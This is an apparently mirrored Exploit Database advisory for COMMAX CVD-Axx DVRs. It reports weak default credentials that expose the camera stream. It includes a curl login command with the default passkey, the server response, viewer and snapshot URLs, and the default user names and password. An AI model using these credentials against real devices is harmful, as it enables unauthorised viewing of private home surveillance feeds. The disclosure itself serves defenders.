COMMAX CVD-Axx DVR 5.1.4 – Weak Default Credentials Stream Disclosure

• Exploit Database
• 18 阅读

• 作者： LiquidWorm
  日期： 2021-08-16
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50210/

• # Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure
  # Date: 02.08.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.commax.com
  
  COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure
  
  
  Vendor: COMMAX Co., Ltd.
  Prodcut web page: https://www.commax.com
  Affected version: CVD-AH04 DVR 4.4.1
  CVD-AF04 DVR 4.4.1
  CVD-AH16 DVR 5.1.4
  CVD-AF16 DVR 4.4.1
  CVD-AF08 DVR 5.1.2
  CVD-AH08 DVR 5.1.2
  
  Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer
  needs and convenience in single or multi-family homes.
  
  Desc: The web control panel uses weak set of default administrative credentials that
  can be easily guessed in remote password attacks and disclose RTSP stream.
  
  Tested on: Boa/0.94.14rc19
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5667
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php
  
  
  02.08.2021
  
  --
  
  
  Login:
  $ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"
  HTTP/1.1 200 OK
  Date: Mon, 16 Aug 2021 01:04:52 GMT
  Server: Boa/0.94.14rc19
  Accept-Ranges: bytes
  Connection: close
  <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN""http://www.w3.org/TR/html4/frameset.dtd">
  
  IE (ActiveX) web player:
  http://192.168.1.2/web_viewer2.html
  
  Snapshots:
  http://192.168.1.2/images/snapshot-01.jpg
  http://192.168.1.2/images/snapshot-02.jpg
  http://192.168.1.2/images/snapshot-nn.jpg
  
  
  Creds:
  Users: ADMIN,USER1,USER2,USER3
  Password: 1234